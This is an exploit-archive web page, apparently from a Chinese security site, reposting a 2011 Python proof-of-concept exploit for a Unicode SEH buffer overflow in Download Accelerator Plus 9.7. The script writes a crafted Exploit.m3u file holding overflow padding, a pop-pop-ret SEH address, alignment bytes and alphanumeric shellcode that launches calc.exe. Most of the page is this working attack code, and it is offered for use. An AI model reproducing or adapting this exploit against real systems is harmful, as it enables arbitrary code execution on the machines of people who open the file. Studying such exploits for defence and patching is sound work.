首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Download Accelerator plus (DAP) 9.7 M3U File Buffer Overflow Exploit (Unicode SE
来源:louredo_@hotmail.com 作者:G0M3S 发布时间:2011-07-25  

#!/usr/bin/python
#
#[+]Exploit Title: Download Accelarator plus(DAP) 9.7 M3U File Buffer Overflow Exploit(UNICODE-SEH)
#[+]Date: 23\07\2011
#[+]Author: C4SS!0 G0M3S
#[+]Software Link: http://download.speedbit.com/dap97_baix.exe
#[+]Version: 9.7
#[+]Tested On: WIN-XP SP3 Brazilian Portuguese
#[+]CVE: N/A
#
#

 

import os
import sys
from time import sleep
 
if os.name == "nt":
    os.system("cls")
    os.system("color 4f")
    os.system("Title Download Accelarator plus(DAP) 9.7 M3U File Buffer Overflow Exploit(UNICODE-SEH) ")
else:
    os.system("clear")

print '''
  
  Download Accelarator plus(DAP) 9.7 M3U File Buffer Overflow Exploit(UNICODE-SEH)
  Created By C4SS!0 G0M3S
  E-mail louredo_@hotmail.com<script type="text/javascript">
/* <![CDATA[ */
(function(){try{var s,a,i,j,r,c,l=document.getElementById("__cf_email__");a=l.className;if(a){s='';r=parseInt(a.substr(0,2),16);for(j=2;a.length-j;j+=2){c=parseInt(a.substr(j,2),16)^r;s+=String.fromCharCode(c);}s=document.createTextNode(s);l.parentNode.replaceChild(s,l);}}catch(e){}})();
/* ]]> */
</script>
  Blog net-fuzzer.blogspot.com
  
'''
shellcode = ("PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZ"
"ABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBYKWPNQGYWOCLLVRPHLJ9SDNDKD6QMNP"
"X01D8N853K8KLM3SHQXKD55NP487LQUI92X6VNCJUKC7D6NSMKRVJNZ02MLWORBJMMMPT8U1VMYO1JGV" #Shellcode WinExec "Calc.exe"
"61PL52QHJKVNUKEMD7W3LKKMKKU2KJPMWIMOXKMMROHMKURK8XCL7OK3JXOPLPOMS8S1CG4R7JWIHOKC"
"STNE3MO0W0SQTPQ5QP3HMZUWVKEWQ3N5HZU5ZJQM5VHO6UIOMOKY0J9KN0Q31X6LNNO3ULYTGX7RXNOQ"
"ITPCK8WM5COJH3KXJA")
buf = ("\x41" * 14277)
buf += ("\x41\x41")
buf += ("\x79\x42") #0x00420079 : pop ebx # pop ecx # ret
buf += ("\x55\x61\x55\x61\x55\x61\x55\x56\x55\x58\xc0\x55\x50\x55\xc3")
buf += ("\x41" * 33)
buf += shellcode

print "\t\t[+]Creating File Exploit.m3u..."
sleep(1)
try:
    f = open("Exploit.m3u","wb")
    f.write("http://"+buf)
    f.close()
    print "\t\t[+]File Exploit.m3u Created."
    sleep(2)
except:
    print "\t\t[-]Error in Create file Exploit.m3u"
    sleep(1)


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·ExtCalendar2 (Auth Bypass/Cook
·OSX universal ROP shellcode
·Kingsoft AntiVirus 2012 KisKrn
·MPlayer Lite r33064 m3u Buffer
·Win32 / Windows7 Sp1 - rename
·win32/ 7 sp1 MessageBox
·Microsoft Internet Explorer to
·SLP (Service Location Protocol
·Ciscokits 1.0 TFTP Denial Of S
·Ciscokits 1.0 TFTP Server File
·Linux x86 egghunt shellcode
·Dell IT Assistant detectIESett
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved